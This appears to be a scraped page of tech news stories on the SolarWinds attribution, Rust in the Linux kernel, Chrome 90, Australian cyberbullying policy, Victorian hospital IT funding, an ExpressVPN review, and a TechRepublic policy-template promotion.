More stories


    SolarWinds: US and UK blame Russian intelligence service hackers for major cyber attack

    Hackers working for the Russian foreign intelligence service are behind the SolarWinds attack, cyber espionage campaigns targeting Covid-19 research facilities and more, according to the United States and the United Kingdom. The US accusation comes in a joint advisory by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI), which also describes ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities in VPN services. The UK has also attributed the attacks to the Russian intelligence service.

    The supply chain attacks targeting IT management software company SolarWinds represented one of the biggest cybersecurity incidents in recent years, with hackers gaining access to the networks of tens of thousands of organisations around the world, including several US government agencies, as well as cybersecurity companies including FireEye and Mimecast.

    Now the US has publicly attributed the SolarWinds attacks to Russian Foreign Intelligence Service (SVR) actors — also known as APT29, Cozy Bear, and The Dukes by cybersecurity researchers — along with additional campaigns, including malware attacks targeting facilities behind Covid-19 vaccine development.

    The five vulnerabilities being targeted by cyber attackers are:

    Security patches are available to fix each of the vulnerabilities and organisations yet to apply them to their network are urged to do so as soon as possible in order to prevent further attacks.

    “NSA, CISA, and FBI strongly encourage all cybersecurity stakeholders to check their networks for indicators of compromise related to all five vulnerabilities and the techniques detailed in the advisory and to urgently implement associated mitigations,” said the cybersecurity advisory.

    Sanctions

    The attribution of the SolarWinds attack comes as the Biden administration issued sanctions against Russia in response to what’s described as “harmful activities by the Government of the Russian Federation”. The financial sanctions specifically mention “malicious” cyber activities by Russian actors, including the SolarWinds cyber attack.

    The UK has also called out the attacks targeting SolarWinds, and is urging organisations to take note, with the National Cyber Security Centre (NCSC) assessing that it’s highly likely the SVR was responsible for gaining unauthorised access to SolarWinds ‘Orion’ software.

    “The UK and US are calling out Russia’s malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action,” said Foreign Secretary Dominic Raab.

    A recent NCSC alert warned users who hadn’t yet applied the security patch to the Fortinet FortiGate vulnerability — which was released in 2019 — to assume their network has been compromised by cyber attackers and to take the appropriate action necessary.



    Google backs effort to bring Rust to the Linux kernel

    After bringing support for the systems programming language Rust to Android, Google is now looking to bring it to the Linux kernel to reduce security flaws. As Google explained last month, Rust — a language that emerged from Mozilla — provides memory safety guarantees to the Android operating system, which has historically been written in C and C++. Google is targeting Rust at new Android code, rather than rewriting the millions of lines of existing code in Rust.

    Now it’s time to move onto the Linux kernel that underlies Android. As ZDNet’s open source authority Steven J. Vaughan-Nichols reported last month, Linux kernel developers think it makes sense to write new parts of the kernel in Rust rather than rewriting the entire Linux kernel, which contains over 30 million lines of code largely written in C.

    “We feel that Rust is now ready to join C as a practical language for implementing the kernel. It can help us reduce the number of potential bugs and security vulnerabilities in privileged code while playing nicely with the core kernel and preserving its performance characteristics,” explains Wedson Almeida Filho of Google’s Android Team.

    Filho notes that the density of memory safety bugs in the Linux kernel is quite low. However, when they do occur, the Android security team generally considers them high-severity flaws. To show where Rust can benefit Linux kernel developers, Google has developed an example driver called ‘semaphore’.

    “How Rust can assist the developer is the aspect that we’d like to emphasize,” notes Filho. “For example, at compile time it allows us to eliminate or greatly reduce the chances of introducing classes of bugs, while at the same time remaining flexible and having minimal overhead.”

    Linux kernel developer Miguel Ojeda this week released a request for comments (RFC) to the Linux mailing list outlining a proposal for a second language in the kernel along with several patches for the Linux kernel written in Rust. Ojeda also set up the Rust for Linux group, which Google’s Android Team has also joined.

    “We know there are huge costs and risks in introducing a new main language in the kernel. We risk dividing efforts and we increase the knowledge required to contribute to some parts of the kernel,” writes Ojeda. “Most importantly, any new language introduced means any module written in that language will be way harder to replace later on if the support for the new language gets dropped. Nevertheless, we believe that, even today, the advantages of using Rust outweigh the cost.”

    As noted by Phoronix, Linux kernel creator Linus Torvalds has already raised some concerns with Rust, although he also said that “on the whole I don’t hate it.” However, Torvalds added that “the ‘run-time failure panic’ is a fundamental issue”.

    Filho explained that, since Rust is new to the kernel, there is an opportunity to improve processes and documentation. “For example, we have specific machine-checked requirements around the usage of unsafe code: for every unsafe function, the developer must document the requirements that need to be satisfied by callers to ensure that its usage is safe; additionally, for every call to unsafe functions (or usage of unsafe constructs like dereferencing a raw pointer), the developer must document the justification for why it is safe to do so,” writes Filho.

    Rust, which only reached 1.0 in 2015, appears to be gaining traction with developers. AWS, Huawei, Google, Microsoft, and Mozilla are backing the Rust Foundation, which launched in February. It’s believed Shane Miller, AWS senior engineering manager, has been elected the first chairperson of the foundation.



    Google releases Chrome 90 with HTTPS by default and security fixes

    Google has just released Chrome version 90, bringing a privacy update that automatically adds HTTPS to a URL when it is available. Chrome engineers flagged the HTTPS feature in February and Google has been testing it in Chrome 90 previews in the Canary and Beta channels. Additionally, Chrome 90 blocks downloads from HTTP sources if the page URL is HTTPS.

    Google explained in a blogpost last month that the HTTPS default should help when users type “example.com” instead of “https://example.com”. Chrome previously used http:// as the default protocol, but now defaults to https://. It should also speed up page loads, since Chrome connects directly to the HTTPS endpoint without needing to be redirected from http:// to https://.

    Chrome 90 also brings the first ‘on/off’ controls for Google’s Privacy Sandbox, which includes Google’s controversial FLoC, its proposed replacement for third-party cookies, which rival browsers Brave and Vivaldi have disabled.

    “With the Chrome 90 release in April, we’ll be releasing the first controls for the Privacy Sandbox (first, a simple on/off), and we plan to expand on these controls in future Chrome releases, as more proposals reach the origin trial stage, and we receive more feedback from end users and industry,” Google announced in January.

    Besides these updates, Chrome 90 includes 37 security fixes. External researchers reported six high-severity issues, 10 medium-severity flaws, and three low-severity flaws.

    This release of Chrome also ships with the AV1 encoder with better support for WebRTC video-conferencing applications, like Duo, Meet, and Webex. Google notes that AV1 offers better screen-sharing capabilities than VP9 and other codecs. It also enables video for users on low-bandwidth networks, for example at 30kbps and lower.


    Australian government prefers education over prosecution to deter cyberbullying

    The federal government has said it is taking a comprehensive approach to cyberbullying by pursuing a range of measures, and considers that education, victim support, and civil avenues are just as important as recourse to criminal law to effectively address cyberbullying.

    The comments were made in its response to a report on the adequacy of existing cyberbullying laws tabled by the Senate Legal and Constitutional Affairs Committee on 28 March 2018. The report [PDF] made nine recommendations. Three years later, the government “supported in principle” five of them, “supported” a further three, and the remaining one was “noted”.

    The committee was charged with looking into the adequacy of existing offences in the Commonwealth Criminal Code and of state and territory criminal laws to capture cyberbullying. Among its recommendations was the request that social media platforms be held to more account by the Australian government than they were in 2018.

    In its response [PDF], the government focused on existing measures, and education, as being sufficient to tackle the issue of cyberbullying.

    “Early intervention measures such as education, harm minimisation, and encouraging the safe and responsible use of technology are proactive measures that can prevent cyberbullying conduct escalating to criminal behaviour and prevent or minimise the harm resulting from cyberbullying incidents,” it wrote.

    “The targets of online abuse and bullying should not be forced offline. Instead, technology platforms, governments, and other users must all play a part in making the internet safe.”

    The government was asked by the committee to consult state and territory governments, non-government organisations, and other relevant parties with the goal of developing a clear definition of cyberbullying. In its response, it pointed to a definition decided on by the Council of Australian Governments (COAG) Bullying and Cyberbullying Senior Officials Working Group:

        Bullying is an ongoing and deliberate misuse of power in relationships through repeated verbal, physical and/or social behaviour that intends to cause physical, social and/or psychological harm. It can involve an individual or a group misusing their power, or perceived power, over one or more persons who feel unable to stop it from happening. Bullying can happen in person or online, via various digital platforms and devices and it can be obvious (overt) or hidden (covert). Bullying behaviour is repeated, or has the potential to be repeated, over time (for example, through sharing digital records). Bullying of any form or for any reason can have immediate, medium and long-term effects on those involved, including bystanders. Single incidents and conflict or fights between equals, whether in person or online, are not defined as bullying.

    The Working Group recommended this definition be used by all schools and promoted to relevant stakeholders, it said.

    The second recommendation asked the government to approach cyberbullying primarily as a social and public health issue. At the same time, it asked the government to consider how it can further improve the quality and reach of preventative and early intervention measures, including education initiatives to reduce the incidence of cyberbullying among children and adults.

    The government pointed to the Keeping our Children Safe Online package overseen by the eSafety Commissioner as addressing this concern, as well as the Online Safety Act and a probe of the use of mobile devices in schools.

    Another recommendation made by the committee, and supported by the government, is the consideration of increasing the maximum penalty for using a carriage service to menace, harass, or cause offence under section 474.17 of the Criminal Code Act 1995 from three years’ imprisonment to five years’ imprisonment. The Online Safety Bill increases this threshold.

    “Cyberbullying, sexting, and other anti-social online behaviours are increasingly engaged in by children and young people. As a result, there is a risk that any new offences or penalties for cyberbullying will disproportionately apply to children, while not necessarily addressing the underlying causes of cyberbullying, or preventing the harm that it causes to victims,” the government wrote. “Criminal sanctions for minors, in particular, should generally be an option of last resort.”

    Further, it said section 474.17 of the Criminal Code has been successfully applied to the prosecution of cyberbullying, including behaviour such as:

      • posting offensive and abusive comments on Facebook tribute pages of deceased children;
      • sending taunting and abusive messages on social media, and posting photos on Instagram with offensive commentary concerning a victim; and
      • in the context of underage grooming, posting inappropriate commentary and manipulative and threatening comments on Facebook accounts of underage girls.

    The Australian House of Representatives last month agreed to the country’s new Online Safety Act that would hand the eSafety Commissioner powers to order the removal of material that seriously harms adults and hold platforms accountable to a set of yet to be determined basic online safety expectations.

    The Online Safety Bill 2021 contains six key priority areas:

      • a cyberbullying scheme to remove material that is harmful to children;
      • an adult cyber abuse scheme to remove material that seriously harms adults;
      • an image-based abuse scheme to remove intimate images that have been shared without consent;
      • basic online safety expectations for the eSafety Commissioner to hold services accountable;
      • an online content scheme for the removal of “harmful” material through take-down powers; and
      • an abhorrent violent material blocking scheme to block websites hosting abhorrent violent material.

    Waved through simultaneously, the Online Safety (Transitional Provisions and Consequential Amendments) Bill 2021 repeals the Enhancing Online Safety Act 2015 upon commencement of the new Online Safety Act. The Bill was given the nod despite testimony from tech companies and civil liberties groups that the legislation was “rushed”.

    IF YOU OR ANYONE YOU KNOW IN AUSTRALIA NEEDS HELP CONTACT ONE OF THESE SERVICES:

      • Suicide Call Back Service on 1300 659 467
      • Lifeline on 13 11 14
      • Kids Helpline on 1800 551 800
      • MensLine Australia on 1300 789 978
      • Beyond Blue on 1300 22 46 36
      • Headspace on 1800 650 890
      • QLife on 1800 184 527


    Victorian government earmarks AU$30m to lift hospital cyber capabilities

    The Victorian government plans to invest a total of AU$30 million to upgrade and modernise the IT infrastructure of 28 of the state’s hospitals and health services in a bid to guard against further cyber attacks.

    The AU$30 million will be divided amongst hospitals across Melbourne and regional and rural health services. Melbourne hospitals will receive a majority share of nearly AU$22 million, while the remaining AU$8 million will be split between regional and rural health services.

    To be delivered as part of the state government’s Clinical Technology Refresh program, the funding will be used specifically to replace older servers and operating systems with new infrastructure. The state government touted the new infrastructure will reduce IT outages, improve network speed, support the rollout of Wi-Fi at the bedside of patients, as well as enable the loading and viewing of high resolution medical imaging, telehealth, and access to clinical support and pathology results from other hospitals.

    “We are helping hospitals and health services across Victoria upgrade computers and IT infrastructure to strengthen reliability and cybersecurity,” Victorian Minister for Health Martin Foley said. “This is about protecting our health services from cyber attacks.”

    Last month, surgeries operated by Eastern Health in Victoria were forced to cancel some patient appointments after experiencing a “cyber incident”. Eastern Health operates the Angliss, Box Hill, Healesville, and Maroondah hospitals, and has many more facilities under management.

    In a statement, Eastern Health said it took many of its systems offline in response to the incident.

    “Many Eastern Health IT systems have been taken off-line as a precaution while we seek to understand and rectify the situation,” it said. “It is important to note, patient safety has not been compromised.”

    Back in 2019, a similar incident affecting Victoria’s hospitals occurred, which resulted in them disconnecting themselves from the internet in an attempt to quarantine a ransomware infection. At the time, the Victorian Department of Premier and Cabinet revealed the impacted hospitals were in the Gippsland Health Alliance and the South West Alliance of Rural Health.

    The incident occurred shortly after the Victorian Auditor-General’s Office (VAGO) labelled the state’s public health system as highly vulnerable to cyber attacks, with a report flagging that security weaknesses within the Department of Health and Human Services’ (DHHS) own technology arm are increasing the likelihood of a breach in 61% of the state’s health services.

    “There are key weaknesses in health services’ physical security, and in their logical security, which covers password management and other user access controls,” VAGO wrote. “Staff awareness of data security is low, which increases the likelihood of success of social engineering techniques such as phishing or tailgating into corporate areas where ICT infrastructure and servers may be located.”

    In its audit, VAGO probed three health providers — Barwon Health, the Royal Children’s Hospital, and the Royal Victorian Eye and Ear Hospital — and examined how two different areas of the DHHS — the Digital Health branch and Health Technology Solution — provide health services in the state.

    In probing the health services, VAGO said it was also able to access accounts, including admin ones, using “basic hacking tools”. The accounts had weak passwords and no MFA.

    “All the audited health services need to do more to protect patient data,” the report said. “We also found that health services do not have appropriate governance and policy frameworks to support data security.”


    ExpressVPN review: A fine VPN service, but is it worth the price?

    ExpressVPN is a popular VPN that’s easy to set up and easy to use. Oddly enough, though, it’s not much of a standout. Compared to other recommended VPN services, pricing is middle of the road, as are performance and features.

    Locations: 160
    Countries: 94
    Simultaneous connections: 5
    Kill switch: yes
    Logging: no
    Price: $12.95/month, or 12 months for $99.95
    Trial: 30-day refund guarantee
    Supported platforms: iOS, Android, MacOS, Windows, Linux, game consoles, smart TVs, routers


    I tried to find out exactly how many servers and IP addresses ExpressVPN has – since other VPN providers tout their numbers. Unfortunately, all the company told me (which is probably more honest and transparent than their stat-driven competitors) was this:

    The one place where ExpressVPN does stand out is in its vast number of client implementations. Whatever computing device you have – be it mobile, tablet, laptop or desktop of any OS flavor – ExpressVPN offers a version for your platform.

    Choosing a fast server connection

    When I evaluate a VPN, I avoid the big “Connect” button for a while after install. I’m usually far more curious about the various options and settings. In the case of ExpressVPN, I found an option under the “hamburger” menu that I liked right away. This isn’t a point-to-point speed test like Fast.com or Speedtest.net. This is a test of all (or a subset of) ExpressVPN’s servers from your location. It took about five minutes, but it was worth the wait. ExpressVPN scans across all their servers to show which were faster in terms of both download speed and latency. Plus, it adds a speed index to tell you which server is faster overall. For me, here in Oregon, it was no surprise that a West Coast server was the fastest overall. It’s also possible to see servers in different countries and how they stack up.

    This is a relatively simple and obvious feature. It’s a wonder more VPN providers don’t offer it.

    More connection options

    By default, ExpressVPN provides a very simple startup screen. Just hit the magic button and it will assign you to a server it recommends. Because I live in the Pacific Northwest, Seattle is an obvious choice for location. Many users will prefer to choose a location to connect. The ExpressVPN connection screen is clean and clear. You can choose from one of the recommended locations, as this screen shows. You can also browse through all locations. Or you can use the search bar to quickly pick a destination server at a desired location. The application allows you to set servers as favorites, so if you have a few you regularly return to, they’re easy to find.

    Settings and options

    The hamburger menu also provides access to ExpressVPN’s options screens. The General tab provides some insight into the capabilities ExpressVPN offers. While not a particularly unique feature, the fact that you can open the VPN on Windows startup and connect to the last used location when the app launches means that you can set up a default behavior to connect to a VPN as soon as your computer boots up. The app also supports a kill switch option, which you can enable or disable, as well as providing access to local devices like printers while connected to a remote server. It allows for traffic sculpting, too, enabling you to use the VPN for certain apps and not for other apps. This is a key feature if you want VPN protection or location translation for some connections, but want to use the full power and speed of your connection for other applications. The protocol setting screen has a lot of options for protocol geeks. You’re probably best just leaving it on Automatic unless you know what you’re doing or have a very specific preference. The Shortcuts tab simply lets you put a few web addresses on the main screen.
    The Browsers tab allows you to control the connection directly from a browser extension. Right now, it supports Chrome and Firefox. Edge is not supported. Finally, let’s look at the Advanced tab. ExpressVPN does allow you to share telemetry back to the company, but that option is properly disabled by default. You can eliminate IPv6 detection, a feature most will leave on. It’s always nice to optimize Windows networking. But the option that interests me most is the option to only use ExpressVPN DNS servers. Since a lot of leakage comes via DNS, it’s interesting that ExpressVPN is locking connections to their servers. Let’s see how well that works for them.

    Performance testing

    I installed the ExpressVPN application on a fresh, fully-updated Windows 10 install. To do this kind of testing, I always use a fresh install so some other company’s VPN leftovers aren’t clogging up the system and possibly influencing results. I have a 1Gb fiber feed, so my baseline network speed is rockin’ fast. To provide a fair US performance comparison, rather than comparing to my local fiber broadband provider, I used speedtest.net and picked a Comcast server in Chicago to test download speed. For each test, I connected to each server three times. The number shown below is the average result of the three connections.

    In looking at these numbers, it’s possible to get carried away by the difference in the baseline speed compared to the VPN speed. That’s not the best measurement, mostly because I have broadband over fiber so my connection speed is extremely high. Also, if you look at the baseline speeds between my reviews, you may notice that they differ considerably going to the same cities. Keep in mind that speed tests are entirely dependent on the performance of all the links between the two locations, and that also includes the time of day, how active those servers are, and how slow or fast the internet is on a given day.

    Normally, I include a connection to Russia among my tests. But because ExpressVPN does not have a server presence in Russia, I was unable to test performance to Rossiyskaya Federatsiya. Here are the results of my tests (download speed: higher is better; ping: lower is better):

    Speed test server               | Baseline download (no VPN) | Ping (no VPN) | Time to connect | Download (VPN) | Ping (VPN) | Leaks
    --------------------------------|----------------------------|---------------|-----------------|----------------|------------|---------
    Dallas – CenturyLink            | 237.8Mbps                  | 57ms          | 7.41 sec        | 118.17Mbps     | 101ms      | No
    Stockholm, Sweden – RETN        | 217.75Mbps                 | 176ms         | 7.45 sec        | 114.91Mbps     | 179ms      | Somewhat
    Taipei, Taiwan – Taiwan Mobile  | 455.82Mbps                 | 145ms         | 8.12 sec        | 123.73Mbps     | 172ms      | Somewhat
    Perth, Australia – Telstra      | 180.57Mbps                 | 222ms         | 7.53 sec        | 97.83Mbps      | 223ms      | No
    Hyderabad, India – Excitel      | 366.59Mbps                 | 244ms         | 7.92 sec        | 82.88Mbps      | 244ms      | No

    When you use a VPN service, it’s natural for performance to drop. After all, you’re running all your packets through an entirely artificial infrastructure designed to hide your path. The real numbers you should look at are the download speed and the ping speed. Are they high enough to do the work you need to do? For all connections, ExpressVPN was…meh. It wasn’t unusable, but it wasn’t stellar, either. That said, all VPN-based connection speeds were more than enough for almost all kinds of video, so it really was good enough. Ping speeds, on the other hand, were too slow to allow any sort of gaming where responsiveness is required. Ping speed is an indication of how quickly a response gets back after a network request is sent from your computer. The lag limitations here are due to actual physics. If you’re sending a packet across the planet, it will take longer to hear back than if you’re sending a packet across town.

    Security

    There are many different ways a VPN can fail you when it comes to security. But one of the most troublesome is when it reveals you as a potentially untrustworthy user. DNSLeak.com and dnsleaktest.com both identified my international connections as possible DNS leaks. This is not the case, because all of them (like the one below for Stockholm) showed the VPN-connected city, rather than my location here in Oregon. But there was another problem. Note that both DNS testing services identified my connection as coming from Security Firewall Ltd. No, that’s not ExpressVPN. But then, there’s this:

    Yeah, if I were running a site and I was concerned about fraud or VPN usage, I’d block these guys. And so, if your connection appears to be coming from such a concerning set of IPs, I’d call this a security connection fail. Security Firewall Ltd was identified for not just my Sweden connection, but for my Taiwan connection as well. So if you’re using servers in Sweden and Taiwan and sites you’re connecting to either don’t allow a connection or make usage difficult, you’ll know it’s because, by virtue of your connection through Security Firewall Ltd, you’re considered a potentially troublesome user. Special.

    I didn’t see this problem universally. When connecting to Australia, the DNS identified ServersAustralia as the ISP. When testing a connection to India, the ISP was identified as Host1Plus. Both have relatively benign reputations. It’s weird, though, unless ExpressVPN simply didn’t know about Security Firewall Ltd’s bad Google juice. I would have thought that since ExpressVPN is providing its own DNS, it would have changed up DNS entries for providers that have a tarnished reputation.

    What are the pros and cons of ExpressVPN?

    Pros:
      • clean user interface
      • easy to set up
      • that great performance scan across all servers
      • enormous library of device support

    Cons:
      • relatively higher price than competitors
      • non-standout performance and features
      • that weird Security Firewall Ltd thing

    The bottom line

    I like ExpressVPN, I do. It’s a breeze to set up and configure. I like how you can determine server speed across the entire network. And searching, saving, and configuring locations is dead simple. But there are a few things that might hold this product back versus its competitors. It’s more expensive than many. That’s not to say it’s wildly overpriced. But at $99 a year, it’s going to have trouble holding its own against those with cheaper plans.

    Performance was also not standout. Like I said above, it’s good enough for video, so performance really is good enough to get the job done. It’s just not a wow — except in the ping sense. There, it’s wow, pings take soooo long. Connection speed wasn’t annoying either. But then there’s that connection to Security Firewall Ltd. You never want an account to be associated with high fraud risk ISPs or IP addresses. Also, if you’re trying to hide the fact that you’re using a VPN, this might not do it.

    So, let’s use my two-criteria metric on ExpressVPN:

      • If you’re counting on this VPN to protect your life: Don’t use it.
      • If you’re counting on this VPN to protect coffee shop surfing: Sure, it’s fine.

    And there you go. There’s nothing really standout about ExpressVPN, but it’s fine. I’d use it when out and about, sipping my peanut butter mocha. Mmm. Peanut butter mocha…

    You can follow my day-to-day project updates on social media. Be sure to follow me on Twitter at @DavidGewirtz, on Facebook at Facebook.com/DavidGewirtz, on Instagram at Instagram.com/DavidGewirtz, and on YouTube at YouTube.com/DavidGewirtzTV.



    100+ critical IT policies every company needs, ready for download

    Whether you’re writing corporate policies for business workers or university policies for faculty and staff, crafting an effective IT policy can be a daunting and expensive task. You could spend hours writing a policies and procedures manual yourself, but consider how much your time is worth. According to job site Glassdoor, the average salary of an IT Director in the U.S. is over $140,000 (depending on geographic location, company, education, etc.). Over a year, that salary breaks down to about $67 per hour. If it takes you one work day to write an IT policy, that single policy costs you $536 ($67 x 8 hours). Don’t have time to write a business or university policy? You can pay a consultant hundreds of dollars to create one for you, but there’s a better way. Download a policy template from TechRepublic Premium. For less than what it would cost to create a single policy, TechRepublic Premium subscribers get access to over 100 ready-made IT policies. Just need one or two policies? We’ve got you covered. You can also purchase individual technology policies if that’s all you need. Once you download one of our information technology policy templates, you can customize it to fit your company’s needs. Here’s a sample of the types of policies in our library.

    IT security policies

    Security incident response policy: The Security Incident Response Policy describes the organization’s process for minimizing and mitigating the results of an information technology security-related incident, such as a data breach, malware infection, insider breach, distributed denial of service attack (DDoS attack) and even equipment loss or theft. The policy’s purpose is to define for employees, IT department staff and users the process to be followed when experiencing an IT-security incident.

    Data encryption policy: The policy’s purpose is to define for employees, computer users and IT department staff the encryption requirements to be used on all computer, device, desktop, laptop, server, network storage and storage area network disks and drives that access or store organization information to prevent unauthorized access to organization communications, email, records, files, databases, application data and other material.

    Information security policy: From sales reports to employee social security numbers, IT is tasked with protecting your organisation’s private and confidential data. To accomplish this, you need to define acceptable and unacceptable use of systems and identify responsibilities for employees, information technology staff, and supervisors/managers. This policy offers a comprehensive outline for establishing standards, rules and guidelines to secure your company’s sensitive data.

    VPN usage policy: Using a VPN to access internal resources comes with responsibilities to uphold network security, as well as to safely and equitably use company information resources. This policy will help you enforce security standards when it comes to VPN use.

    Password management policy: Employee passwords are the first line of defense in securing the organization from inappropriate or malicious access to data and services. Password-driven security may not be the perfect solution, but the alternatives haven’t gained much traction. This password policy defines best practices that will make password protection as strong and manageable as possible.

    Mobile device security policy: More and more users are conducting business on mobile devices. This can be due to increases in remote workers, travel, global workforces, or just being on-the-go. This policy provides guidelines for mobile device security needs in order to protect businesses and their employees from security threats.

    Identity theft protection policy: Help protect your employees and customers from identity theft. This policy outlines precautions for reducing risk, signs to watch out for, and steps to take if you suspect identity theft has occurred.

    Remote access policy: This policy outlines guidelines and processes for requesting, obtaining, using, and terminating remote access to organization networks, systems, and data.

    User privilege policy: This policy provides guidelines for the delegation of user privileges on organization-owned systems and guidance for high-privilege and administrator accounts.

    Perimeter security policy: While security principles should apply throughout the organization, locking down the perimeter and ensuring only necessary connections get through is an especially critical goal. This policy provides guidelines for securing your organization’s network perimeter from potential vulnerabilities.

    Security awareness and training policy: A security policy is only as valuable as the knowledge and efforts of those who adhere to it, whether IT staff or regular users. This policy is designed to help your information technology staff guide employees toward understanding and adhering to best security practices that are relevant to their job responsibilities and avoid a potential security incident.

    IT emergency response and disaster recovery policies

    Disaster recovery policy and business continuity plan: Natural and man-made disasters can jeopardize the operations and future of any company, so it’s critical to develop a plan to help ensure ongoing business processes in a crisis. This download explains what needs to go into your DR/BC plan to help your organization prepare for, and recover from, a potential disaster.

    Severe weather and emergency policy: This policy template offers guidelines for responding to severe weather activity and other emergencies. The download includes both a PDF version and an RTF document to make customization easier.

    Resource and data recovery policy: All employees should be familiar with the processes for recovering information if it becomes lost, inaccessible, or compromised. This policy provides guidelines for the recovery of data from company-owned or company-purchased resources, equipment, and/or services.

    Incident response policy: Whether initiated with criminal intent or not, unauthorized access to an enterprise network or campus network is an all too common occurrence. Every enterprise needs to establish a plan of action to assess and then recover from unauthorized access to its network. This policy provides a foundation from which to start building your specific procedures.

    IT personnel policies

    Contract work policy: It’s common practice for companies to leverage contractors in order to offload work to specialized individuals or reduce costs associated with certain tasks and responsibilities. Our Contract work policy can help your company establish guidelines for retaining, overseeing and terminating contracts, including orientation, access and role determinations and business considerations.

    IT training policy: Successful IT departments are defined not only by the technology they deploy and manage, but by the skills and capabilities of their people. This IT training policy is designed to help workers identify training options that fit within their overall career development track and get the necessary approvals for enrollment and reimbursement.

    Employee performance review policy: A good performance review emphasizes the positives and seeks to turn weak areas into measurable goals to strengthen employee abilities and adherence to job responsibilities. It also solicits input from employees to address any issues or concerns they may have with their role at the company. TechRepublic Premium’s Performance Review Policy and the accompanying review template can help you answer these questions and implement fair, effective and comprehensive reviews for your staff.

    Third party vendor policy: Many businesses rely on outside companies, known as third party organizations, to handle their data or services. This policy provides guidelines for establishing qualified third party vendors with whom to do business and what requirements or regulations should be imposed upon their operational processes.

    Moonlighting policy: Moonlighting is especially frequent in technology, where people with varying skills and backgrounds may find their abilities in demand by multiple companies. This policy provides guidelines for permissible employee moonlighting practices to establish expectations for both workers and organizations.

    Drug and alcohol abuse policy: This policy provides a working framework for establishing rules and procedures that prohibit drug and alcohol use on company premises or in company vehicles.

    Employee non-compete agreement: Don’t let your valuable corporate assets, proprietary information, or intellectual property walk out the door when an employee leaves the company.

    Workplace safety policy: This policy will help ensure that your company facilities are safe for all employees, visitors, contractors, and customers.

    Severance policy: The Severance Policy outlines the differences between simple departure scenarios, where the employee is paid a final check for the time they worked and any unused vacation hours, and more complex situations.

    Interviewing guidelines policy: This policy will help organizations conduct useful and appropriate interviews with potential new hires, both from a proper methodology perspective and a legal standpoint.

    Employee objectives policy: Defining objectives is a prime way to motivate employees, giving them tangible proof of their accomplishments, their progress, and their contributions to the business. However, it’s important to follow certain guidelines to provide an effective framework for establishing objectives, monitoring them, and helping employees complete them.

    Personnel screening policy: This policy provides guidelines for screening employment candidates, whether full-time or part-time employees or contingent workers (including temporary, volunteer, intern, contract, consultant, offshore, or 1099 workers), for high-risk roles. It aims to ensure that candidates meet regulatory and circumstantial requirements for employment.

    Telecommuting policy: This policy describes the organization’s processes for requesting, obtaining, using, and terminating access to organization networks, systems, and data for the purpose of enabling staff members to regularly work remotely on a formal basis.

    IT staff systems/data access policy: IT pros typically have access to company servers, network devices, and data so they can perform their jobs. However, that access entails risk, including exposure of confidential information and interruption in essential business services. This policy offers guidelines for governing access to critical systems and confidential data.

    Ergonomics policy: A safe and healthy work environment provides the foundation for all employees to be at their most productive. Not only does it promote productivity in the workforce, it also helps prevent accidents, lawsuits, and in extreme cases, serious injury and potentially loss of life. This policy establishes procedures to help ensure a safe, ergonomically healthy environment.

    IT asset management policies

    IT hardware inventory policy: This policy describes guidelines your organization can follow to track, process, and decommission IT equipment.

    Asset control policy: This customizable policy template includes procedures and protocols for supporting effective organizational asset management, specifically focused on electronic devices.

    IT hardware procurement policy: A strong hardware procurement policy will ensure that requirements are followed and that all purchases are subject to the same screening and approval processes.

    BYOD policy: Our BYOD (Bring Your Own Device) Policy describes the steps your employees must take when connecting personal devices to the organization’s systems and networks.

    Home usage of company-owned equipment policy: Employees who work from home often use company-supplied systems and devices, which helps ensure that they have consistent, state-of-the-art equipment to do their work. However, organizations should provide usage guidelines, such as this policy, covering the responsibilities of IT staff and employees.

    Hardware decommissioning policy: When decommissioning hardware, standard and well-documented practices are critical. The steps outlined in this policy will guide your staff methodically through the process. Assets won’t be unnecessarily wasted or placed in the wrong hands, data stored on this hardware will be preserved as needed (or securely purged), and all ancillary information regarding hardware (asset tags, location, status, etc.) will be updated.

    Acceptable use policy: Equipment: Employees rely on IT to provide the equipment they need to get things done. This policy template assists in directing employees to use that equipment safely and within organizational guidelines.

    IT software management policies

    Software usage policy: This policy is designed to help companies specify the applications that are allowed for installation and use on computer systems and mobile devices owned by the organization. It also covers the appropriate usage of these applications by company employees and support staff.

    Development lifecycle policy: Software development is a complex process which involves a specific series of steps (known as the development lifecycle) to transform a concept into a deliverable product. The purpose of this policy is to provide guidelines for establishing and following a development lifecycle system.

    Patch management policy: A comprehensive patching strategy is a must in order to reap the benefits, but a willy-nilly approach can result in unexpected downtime, dissatisfied users and even more technical support headaches. This policy provides guidelines for the appropriate application of patches.

    Artificial intelligence ethics policy: Artificial intelligence has the power to help businesses as well as employees by providing greater data insights, better threat protection, more efficient automation and other advances. However, if misused, artificial intelligence can be a detriment to individuals, organizations, and society overall. This policy offers guidelines for the appropriate use of and ethics involving artificial intelligence.

    Scheduled downtime policy: IT departments must regularly perform maintenance, upgrades, and other service on the organization’s servers, systems, and networks. Communicating scheduled downtime in advance to the proper contacts helps ensure that routine maintenance and service tasks do not surprise other departments or staff, and it enables others within the organization to prepare and plan accordingly.

    Internet and email usage policy: This policy sets forth guidelines for the use of the internet, as well as internet-powered electronic communications services, including email, proprietary group messaging services (e.g., Slack), and social networking services (e.g., Facebook, Twitter) in business contexts. It also covers Internet of Things (IoT) use and bring-your-own-device (BYOD) practices.

    Virtualization policy: Virtualization platforms are available from a number of vendors, but it’s still critical to maintain your virtualization environment to avoid unnecessary resource consumption, out-of-compliance systems or applications, data loss, security breaches, and other negative outcomes. This policy defines responsibilities for both end users and the IT department to ensure that the virtualized resources are deployed and maintained effectively.

    Machine automation policy guidelines: Many industries rely on machine automation implementations to save money and reduce risk. However, along with the benefits comes the critical need to implement policies for its proper use. This set of guidelines will help your organization keep its machine automation safe, reliable, and in compliance.

    Software automation policy guidelines: Software automation is used for many business and IT processes, depending on industry vertical and individual company business and IT needs. Because this automation is far-reaching, policy considerations touch on many areas. This set of guidelines will help you cover all the bases as you build a comprehensive software automation policy.

    About TechRepublic Premium

    TechRepublic Premium solves your toughest IT issues and helps jumpstart your career or next project. Complex tech topics are distilled into concise, yet comprehensive primers that keep you (and your CEO, CFO, and boardroom) ahead of the curve. Save time and effort with our ready-made policies, templates, lunch-and-learn presentations, and return-on-investment calculators. We have the information, documents, and tools every IT department needs – from the enterprise business unit to the one-person shop – all in one place.


    Cyber criminals are installing cryptojacking malware on unpatched Microsoft Exchange servers

